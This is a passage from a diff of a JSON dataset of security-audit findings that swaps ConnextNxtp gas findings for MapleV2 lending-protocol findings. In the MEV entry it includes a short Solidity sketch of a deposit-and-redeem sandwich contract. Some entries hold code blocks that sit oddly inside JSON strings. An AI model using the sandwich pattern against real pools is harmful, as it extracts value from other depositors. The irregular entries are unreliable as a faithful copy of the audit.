is unnecessary. Since on the mirror domain, we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which by the way anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus the current implementation is wasting gas.", + "title": "_getCollateralRequiredFor should round up", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Low Risk" ] }, { - "title": "getD can be optimized by removing an extra multiplication by d per iteration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have $f(D) = \frac{1}{n^{n+1} a \prod x_i} D^{n+1} + \left(1 - \frac{1}{na}\right) D - \sum x_i$ and, having/assuming $n$, $a$, $x_i$ are fixed, we are using Newton's method to find a solution for $f = 0$. The original implementation is using $D' = D - \frac{f(D)}{f'(D)} = \frac{\left(na \sum x_i + \frac{D^{n+1}}{n^{n-1} \prod x_i}\right) D}{(na - 1) D + (n + 1) \frac{D^{n+1}}{n^{n} \prod x_i}}$, which can be simplified to $D' = \frac{na \sum x_i + \frac{D^{n}}{n^{n-1} \prod x_i} D}{(na - 1) + (n + 1) \frac{D^{n}}{n^{n} \prod x_i}}$", + "title": "Use the cached variable in makePayment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "_recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The exponentiation in this statement can be completely removed to save gas.", + "title": "No need to explicitly initialize variables with default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "By default, a variable is set to 0 for uint, false for bool, address(0) for address... Explicitly initializing/setting it with its default value wastes gas.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Message.leaf's memory manipulation is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed.", + "title": "Cache calculation in getExpectedAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The decimal precision calculation is used twice in the getExpectedAmount function; caching it in a new variable would save some gas.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "coerceBytes32 can be more optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask. Note: coerceBytes32 doesn't seem to be used. If that is the case it could also be removed.", + "title": "For-Loop Optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The for-loop can be optimized in 4 ways: 1. Removing initialization of the loop counter if the value is 0 by default. 2. Caching the array length outside the loop. 3. Prefix increment (++i) instead of postfix increment (i++). 4. Unchecked increment. - for (uint256 i_ = 0; i_ < loans_.length; i_++) { + uint256 length = loans_.length; + for (uint256 i_; i_ < length; ) { ... + unchecked { ++i_; } }", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Consider removing domains from propagate() arguments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _domains to verify its hash against domainsHash, and to emit an event. 
Hence, its only use seems to be to notify off-chain agents of the supported domains.", + "title": "Pool._divRoundUp can be more efficient", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The gas cost of Pool._divRoundUp can be reduced in the context that it's used in.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Loop counter can be made uint256 to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are several loops that use a uint8 as the type for the loop variable. Changing that to uint256 can save some gas.", + "title": "Liquidator uses different reentrancy guards than rest of codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "All other reentrancy guards of the codebase use values 1/2 instead of 0/1 to indicate NOT_LOCKED/LOCKED.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Set owner directly to zero address in renounceOwnership", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. In the renounceOwnership function, _proposed will always be the zero address, so instead of setting the variable _proposed as owner, we can directly set address(0) as the new owner. 2. Similarly for the renounceOwnership function, also set address(0) as the new owner.", + "title": "Use block.timestamp instead of domainStart in removeLoanImpairment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The removeLoanImpairment function adds back all interest from the payment's start date to domainStart. The _advanceGlobalPaymentAccounting sets domainStart to block.timestamp.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "Retrieve decimals() once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are several locations where the number of decimals() of tokens are retrieved. As all tokens are whitelisted, it would also be possible to retrieve the decimals() once and store these to save gas. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", + "title": "setTimelockWindows checks isGovernor multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The Globals.setTimelockWindows function calls setTimelockWindow in a loop and each time setTimelockWindow's isGovernor is checked.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "The root... 
function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here.", + "title": "fullDaysLate computation can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The fullDaysLate computation can be optimized.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Gas Optimization" ] }, { - "title": "The insert function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If we use assembly, the scratch space for hashing, and unrolling of the loop, we can save some gas.", + "title": "Users can prevent repossessed funds from being claimed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The DebtLocker.sol contract dictates an active liquidation by the following two conditions: The _liquidator state variable is a non-zero address. The current balance of the _liquidator contract is non-zero. If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repossessed funds as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue. The Maple team will be addressing this in their V2 release.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "branchRoot function in Merkle.sol can be more optimized by using YUL, unrolling the loop and using the scratch space", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "We can use assembly, unroll the loop in branchRoot, and use the scratch space to save gas.", + "title": "MEV whenever totalAssets jumps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "An attack users can try, in order to capture large interest payments, is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by: Optimistically assuming the next interest payment will be paid back and accruing the interest payment linearly over the payment interval. Adding a withdrawal period. However, there are still circumstances where the totalAssets increase by a large amount at once: Users paying back their payment early. The jump in totalAssets will be the paymentAmount - timeElapsedSincePaymentStart / paymentInterval * paymentAmount. Users paying back their entire loan early (closeLoan). Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now. 
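A minimal sketch of the sandwich pattern, assuming a hypothetical 4626-style pool interface (the withdrawal period noted above delays the exit leg in practice):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Hypothetical minimal interface for the sketch; the real pool differs.
interface IPoolLike {
    function deposit(uint256 assets_, address receiver_) external returns (uint256 shares_);
    function redeem(uint256 shares_, address receiver_, address owner_) external returns (uint256 assets_);
}

// Sketch only: buy shares right before totalAssets jumps, exit right after.
contract SandwichSketch {
    IPoolLike public immutable pool;

    constructor(IPoolLike pool_) { pool = pool_; }

    function frontRun(uint256 assets_) external returns (uint256 shares_) {
        shares_ = pool.deposit(assets_, address(this)); // pre-jump share price
    }

    function backRun(uint256 shares_) external returns (uint256 assets_) {
        assets_ = pool.redeem(shares_, address(this), address(this)); // post-jump share price
    }
}
```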
21", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Replace divisions by powers of 2 by right shifts and multiplications by left shifts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When a variable X is divided (multiplied) by a power of 2 (C = 2 c) which is a constant value, the division (multiplication) operation can be replaced by a right (left) shift to save gas.", + "title": "Use ERCHelper approve() as best practice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The ERC20 approve function is being used by fundsAsset in fundLoan() to approve the max amount which does not check the return value.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "TypedMemView.castTo can be optimized by using bitmasks instead of multiple shifts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView.castTo uses bit shifts to clear the type flag bits of a memView, instead masking can be used. Also an extra OR is used to calculate the final view.", + "title": "Additional verification in removeLoanImpairment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Make domain immutable in Facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Domain in Connector.sol is an immutable variable, however it is defined as a storage variable in LibConnextStorage.sol. Also once initialized in DiamondInit.sol, it cannot be updated again. To save gas, domain can be made an immutable variable to avoid reading from storage.", + "title": "Can check msg.sender != collateralAsset/fundsAsset for extra safety", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...) 
in the liquidator to be executing arbitrary code on one of the tokens, which could let an attacker drain the funds.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Cache router balance in repayAavePortal()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "repayAavePortal() reads s.routerBalances[msg.sender][local] twice: if (s.routerBalances[msg.sender][local] < _maxIn) revert PortalFacet__repayAavePortal_insufficientFunds(); ... s.routerBalances[msg.sender][local] -= amountDebited; This can be cached to only read it once.", + "title": "IERC4626 Implementation of preview and max functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "For the preview functions, EIP 4626 states: MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert. But the comments in the interface currently state: MUST NOT revert. In addition to the comments, there is the actual behavior of the preview functions. A commonly accepted interpretation of the standard is that these preview functions should revert in the case of conditions such as protocolPaused, !active, !openToPublic, totalAssets > liquidityCap, etc. The argument basically states that the max functions should return 0 under such conditions and the preview functions should revert whenever the amount exceeds the max.", "labels": [ - "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "Spearbit", + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Unrequired if condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The below if condition is not required as price will always be 0. This is because if the contract finds a direct price for the asset it returns early; otherwise, if there is no direct price, tokenPrice is set to 0. This means for the code ahead tokenPrice will currently be 0. function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { ... uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } if (tokenPrice == 0) { ... }", + "title": "Set domainEnd correctly in intermediate _advanceGlobalPaymentAccounting steps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "In the _advanceGlobalPaymentAccounting function, domainEnd is set to payments[paymentWithEarliestDueDate].paymentDueDate, which is possibly zero if the last payment has just been accrued past. This is currently not an issue, because in this scenario domainEnd would never be used before it is set back to its correct value in _updateIssuanceParams. However, for increased readability, it is recommended to prevent this odd intermediate state from ever occurring.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Delete slippage for gas refund", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once s.slippage[_transferId] is read, it's never read again. 
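A minimal sketch of the delete-for-refund pattern, assuming a plain mapping in place of the facet's diamond storage:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Minimal sketch, assumed storage layout: zeroing the slot after its
// final read earns a partial gas refund (SSTORE to zero).
contract SlippageRefundSketch {
    mapping(bytes32 => uint256) internal slippage;

    function _consumeSlippage(bytes32 transferId_) internal returns (uint256 slippage_) {
        slippage_ = slippage[transferId_]; // final read of the slot
        delete slippage[transferId_];      // refund-eligible zeroing
    }
}
```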
It can be deleted to get some gas refund.", + "title": "Replace hard-coded value with PRECISION constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The constant PRECISION is equal to 1e30. The hard-coded value 1e30 is used in the _queueNextPayment function, which can be replaced by PRECISION.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Emit event at the beginning in _setOwner()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_setOwner() maintains an extra variable oldOwner just to emit an event later: function _setOwner(address newOwner) internal { address oldOwner = _owner; _owner = newOwner; _proposedOwnershipTimestamp = 0; _proposed = address(0); emit OwnershipTransferred(oldOwner, newOwner); } If this emit is done at the beginning, oldOwner can be removed.", + "title": "Use of floating pragma version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Contracts should be deployed using a fixed pragma version. Locking the pragma helps to ensure that contracts do not accidentally get deployed using, for example, an outdated compiler version that might introduce bugs that affect the contract system negatively.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Simplify the assignment logic of _params.normalizedIn in _xcall", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "When amount > 0 we should have asset != address(0) since otherwise the call would revert: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } and when amount == 0 _params.normalizedIn is 0 which is the value passed to _xcall from xcall or xcallIntoLocal. So we can move the calculation for _params.normalizedIn into the if (_amount > 0) { block. if (_amount > 0) { // Transfer funds of input asset to the contract from the user. AssetLogic.handleIncomingAsset(_asset, _amount); // Swap to the local asset from adopted if applicable. // TODO: drop the \"IfNeeded\", instead just check whether the asset is already local / needs swap here. _params.bridgedAmt = AssetLogic.swapToLocalAssetIfNeeded(key, _asset, local, _amount, _params.slippage); // Get the normalized amount in (amount sent in by user in 18 decimals). 
_params.normalizedIn = AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); } gas saved according to test cases: test_Connext__bridgeFastOriginLocalToDestinationAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__bridgeFastAdoptedShouldWork() (gas: -39 (-0.001%)) test_Connext__unpermissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_worksWithPositiveSlippage() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_adoptedTransferWorks() (gas: -39 (-0.003%)) test_Connext__permissionedCallsWork() (gas: -39 (-0.003%)) test_BridgeFacet__xcallIntoLocal_works() (gas: -39 (-0.003%)) test_BridgeFacet__xcall_localTokenTransferWorksWithAdopted() (gas: -39 (-0.003%)) test_Connext__bridgeFastLocalShouldWork() (gas: -39 (-0.004%)) test_BridgeFacet__xcall_localTokenTransferWorksWhenNotAdopted() (gas: -39 (-0.004%)) test_Connext__bridgeSlowLocalShouldWork() (gas: -39 (-0.005%)) test_Connext__zeroValueTransferWithEmptyAssetShouldWork() (gas: -54 (-0.006%)) test_BridgeFacet__xcall_worksIfPreexistingRelayerFee() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_localTokenTransferWorksWithoutAdopted() (gas: -39 (-0.013%)) test_BridgeFacet__xcall_zeroRelayerFeeWorks() (gas: -32 (-0.014%)) test_BridgeFacet__xcall_canonicalTokenTransferWorks() (gas: -39 (-0.014%)) test_LibDiamond__initializeDiamondCut_withZeroAcceptanceDelay_works() (gas: -3812 (-0.015%)) test_BridgeFacet__xcall_zeroValueEmptyAssetWorks() (gas: -54 (-0.034%)) test_BridgeFacet__xcall_worksWithoutValue() (gas: -795 (-0.074%)) test_Connext__zeroValueTransferShouldWork() (gas: -761 (-0.091%)) Overall gas change: -6054 (-0.308%) Note, we need to make sure in future updates the value of _params.normalizedIn == 0 for any invocation of _xcall. Connext: Solved in PR 2511. Spearbit: Verified.", + "title": "PoolManager has low-level shares computation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager has low-level shares computation logic that should ideally only be in the ERC4626 Pool to separate the concerns.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Simplify BridgeFacet._sendMessage by defining _token only when needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In BridgeFacet._sendMessage, _local might be a canonical token that does not necessarily have to follow the IBridgeToken interface. 
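A minimal sketch, assuming a hypothetical one-function IBridgeToken, of touching the interface only on the non-canonical branch:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Assumed minimal interface for the sketch; the real IBridgeToken differs.
interface IBridgeToken {
    function detailsHash() external view returns (bytes32);
}

// Sketch: canonical tokens never need to implement IBridgeToken because
// the interface is only consulted on the non-canonical branch.
contract SendMessageSketch {
    function _tokenDetailsHash(address token_, bool isCanonical_) internal view returns (bytes32 hash_) {
        if (!isCanonical_) {
            hash_ = IBridgeToken(token_).detailsHash(); // only reached for non-canonical tokens
        }
    }
}
```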
But that is not an issue since _token is only used when !_isCanonical.", + "title": "Add additional checks to prevent refinancing/funding a closed loan", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "It's important that an already liquidated loan is not reused by refinancing or funding again as it would break a second liquidation when the second liquidator contract is deployed with the same arguments and salt.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Using BridgeMessage library in BridgeFacet._sendMessage can be avoided to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The usage of the BridgeMessage library to calculate _tokenId, _action, and finally the formatted message involves lots of unnecessary memory writes, redundant checks, and overall complicates understanding the flow of the codebase. The BridgeMessage.formatMessage(_tokenId, _action) value passed to IOutbox(s.xAppConnectionManager.home()).dispatch is at the end with the current implementation supposed to be: abi.encodePacked( _canonical.domain, _canonical.id, BridgeMessage.Types.Transfer, _amount, _transferId ); Also, it is redundant that the BridgeMessage.Types.Transfer has been passed to dispatch. It does not add any information to the message unless dispatch also accepts other types. This also adds extra gas overhead due to memory consumption both in the origin and destination domains.", + "title": "PoolManager.removeLoanManager errors with out-of-bounds if loan manager not found", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager.removeLoanManager errors with an out-of-bounds error if the loan manager is not found.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "s.aavePool can be cached to save gas in _backLoan", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "s.aavePool can be cached to save gas by only reading once from the storage.", + "title": "PoolManager.removeLoanManager does not clear loanManagers mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The PoolManager.removeLoanManager does not clear the reverse loanManagers[mapleLoan] = loanManager mapping.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "<= or >= when comparing a constant can be converted to < or > to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In this context, we are doing the following comparison: X <= C // or X >= C Where X is a variable and C is a constant expression. But since the right-hand side of <= (or >=) is the constant expression C we can convert <= into < (or >= into >) to avoid extra opcode/bytecodes being produced by the compiler.", + "title": "Pool._requestRedeem reduces the wrong approval amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The requestRedeem function transfers escrowShares_ from owner but reduces the approval by shares_. 
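A paraphrased sketch of the mismatch, using hypothetical helpers rather than Maple's actual code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Hypothetical sketch: the transfer moves escrowShares_ while the
// allowance is reduced by shares_; the two only coincide while the
// conversion is 1:1.
abstract contract RequestRedeemSketch {
    function _convertToEscrowShares(uint256 shares_) internal view virtual returns (uint256);
    function _decreaseAllowance(address owner_, address spender_, uint256 amount_) internal virtual;
    function _transfer(address from_, address to_, uint256 amount_) internal virtual;

    function requestRedeem(uint256 shares_, address owner_) external {
        uint256 escrowShares_ = _convertToEscrowShares(shares_);
        if (msg.sender != owner_) {
            _decreaseAllowance(owner_, msg.sender, shares_); // arguably should be escrowShares_
        }
        _transfer(owner_, address(this), escrowShares_);
    }
}
```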
Note that in the current code these values are the same but for future PoolManager upgrades this could change.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "Use memory's scratch space to calculateCanonicalHash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "calculateCanonicalHash uses abi.encode to prepare a memory chunk to calculate and return a hash value. Since only 2 words of memory are required to calculate the hash, we can utilize the memory's scratch space [0x00, 0x40) in this regard. Using this approach would prevent paying for memory expansion costs among other things.", + "title": "Issuance rate for double-late claims does not need to be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The previousRate_ for the 8c) case in claim is always zero because the payment is late (!onTimePayment_). The subtraction can be removed. I'd suggest removing the subtraction here as it's confusing. The first payment's IR was reduced in _advanceGlobalPaymentAccounting, the newly scheduled one that is also past its due date never increased the IR.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "isLocalOrigin can be optimized by using a named return parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "isLocalOrigin after getting the code size of _token returns a comparison result as a bool: assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; This last comparison can be avoided if we use a named return variable since the cast to the bool type would automatically do the check for us. Currently, the check/comparison is performed twice under the hood. Note: also see issue \"Use contract.code.length\".", + "title": "Additional verification that paymentIdOf[loan_] is not 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Most functions in the loan manager use the value paymentIdOf[loan_] without first checking if it's the default value of 0. Anyone can pay off a loan at any time to cause the claim function to set paymentIdOf[loan_] to 0, so even the privileged functions could be front-run to call on a loan with paymentIdOf 0. This is not an issue in the current codebase because each function would revert for some other reasons, but it is recommended to add an explicit check so future upgrades on other modules don't make this into a more serious issue.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "MapleV2.pd", + "Severity: Informational" ] }, { - "title": "The branching decision in AmplificationUtils._getAPrecise can be removed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_getAPrecise uses an if/else block to compare a1 to a0. This comparison is unnecessary if we use a more simplified formula to return the interpolated value of a.", + "title": "LoanManager redundant check on late payment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "The LoanManager checks block.timestamp <= nextPaymentDueDate_ in one of the if statements. 
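An illustrative sketch of the tautology, under an assumed simplified signature:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

// Illustrative only: once lateness against the later due date is
// established, a comparison against the earlier due date is implied.
contract LateCheckSketch {
    function fullDaysLate(uint256 previousDueDate_, uint256 nextDueDate_)
        external view returns (uint256 daysLate_)
    {
        require(previousDueDate_ <= nextDueDate_, "due dates out of order");
        require(block.timestamp > nextDueDate_, "not late");
        // block.timestamp > previousDueDate_ always holds here, because
        // previousDueDate_ <= nextDueDate_ < block.timestamp.
        daysLate_ = (block.timestamp - nextDueDate_ + 1 days - 1) / 1 days; // ceiling division
    }
}
```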
The payment is already known to be late at this point in the code, so block.timestamp > previousPaymentDueDate_ is always true.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Informational" ] }, { - "title": "Optimize increment in insert()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The increment tree.count in function insert() can be optimized. function insert(Tree storage tree, bytes32 node) internal returns (uint256) { uint256 size = tree.count + 1; ... tree.count = size; ... }", + "title": "Add encodeArguments/decodeArguments to WithdrawalManagerInitializer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "Unlike the other Initializers, the WithdrawalManagerInitializer.sol does not have public encodeArguments/decodeArguments functions, and PoolDeployer needs to be changed to use these functions correctly.", "labels": [ "Spearbit", - "ConnextNxtp", + "MapleV2.pd", "Severity: Informational" ] }, { - "title": "Optimize calculation in loop of dequeueVerified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function dequeueVerified() can be optimized in the following way: (block.number - commitBlock >= delay) is the same as (block.number - delay >= commitBlock) And block.number - delay is constant so it can be calculated outside of the loop. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { uint256 commitBlock = queue.commitBlock[last]; if (block.number - commitBlock >= delay) { ... } } }", + "title": "Reorder WM.processExit parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", + "body": "All 